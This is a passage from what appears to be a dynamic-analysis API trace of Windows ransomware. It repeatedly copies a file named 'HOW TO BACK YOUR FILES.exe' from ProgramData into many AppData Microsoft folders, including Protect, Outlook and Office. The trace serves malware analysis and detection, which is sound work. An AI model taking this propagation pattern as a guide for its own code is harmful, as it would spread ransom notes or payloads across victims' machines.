returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect" [0109.227] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.227] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.228] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.228] GetLastError () returned 0x0 [0109.228] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.228] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.228] CloseHandle (hObject=0x120) returned 1 [0109.228] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.229] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.229] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x720e3c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x720e3c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.229] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.229] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.229] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000" [0109.229] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3390b0 | out: hHeap=0x2b0000) returned 1 [0109.229] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0109.229] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 110 [0109.229] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000" [0109.229] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.229] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.230] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.230] GetLastError () returned 0x0 [0109.230] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.230] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.230] CloseHandle (hObject=0x120) returned 1 [0109.230] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.230] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.230] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x541f1c70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x721560a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x721560a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.230] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.230] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.231] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500" [0109.231] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x338fc8 | out: hHeap=0x2b0000) returned 1 [0109.231] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a68 | out: hHeap=0x2b0000) returned 1 [0109.231] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500") returned 109 [0109.231] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500" [0109.231] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.231] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.231] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.232] GetLastError () returned 0x0 [0109.232] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.232] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.232] CloseHandle (hObject=0x120) returned 1 [0109.232] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.232] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.232] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x721ee620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x721ee620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.232] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.232] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.232] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof" [0109.232] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f05a0 | out: hHeap=0x2b0000) returned 1 [0109.232] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a48 | out: hHeap=0x2b0000) returned 1 [0109.232] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof") returned 61 [0109.232] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof" [0109.232] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.232] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\proof\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.233] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.233] GetLastError () returned 0x0 [0109.233] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.233] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.233] CloseHandle (hObject=0x120) returned 1 [0109.233] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.233] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.234] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x510b16f0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5088ffa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5088ffa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.234] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.234] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.234] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint" [0109.234] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0109.234] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0109.234] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint") returned 66 [0109.234] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint" [0109.234] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.234] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\powerpoint\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.235] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.235] GetLastError () returned 0x0 [0109.235] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.235] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.235] CloseHandle (hObject=0x120) returned 1 [0109.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.235] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.235] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33c0ebb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x508b6100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x508b6100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.235] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.235] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.236] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook" [0109.236] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0490 | out: hHeap=0x2b0000) returned 1 [0109.236] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0109.236] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook") returned 63 [0109.236] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook" [0109.236] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.236] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.236] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.237] GetLastError () returned 0x0 [0109.237] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.237] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.237] CloseHandle (hObject=0x120) returned 1 [0109.237] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.237] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.237] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5c734300, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x72214780, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x72214780, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.237] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.237] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.237] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office" [0109.237] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0408 | out: hHeap=0x2b0000) returned 1 [0109.237] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79e8 | out: hHeap=0x2b0000) returned 1 [0109.237] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office") returned 62 [0109.237] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office" [0109.237] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.237] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.238] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.238] GetLastError () returned 0x0 [0109.238] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.238] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.238] CloseHandle (hObject=0x120) returned 1 [0109.238] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0109.238] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0109.239] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43c8ae30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x72214780, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x72214780, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0109.239] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0109.239] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0109.239] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent" [0109.239] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0109.239] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79e8 | out: hHeap=0x2b0000) returned 1 [0109.239] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned 69 [0109.239] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent" [0109.239] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.239] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.240] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.240] GetLastError () returned 0x0 [0109.240] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0109.240] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0109.240] CloseHandle (hObject=0x120) returned 1 [0109.240] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 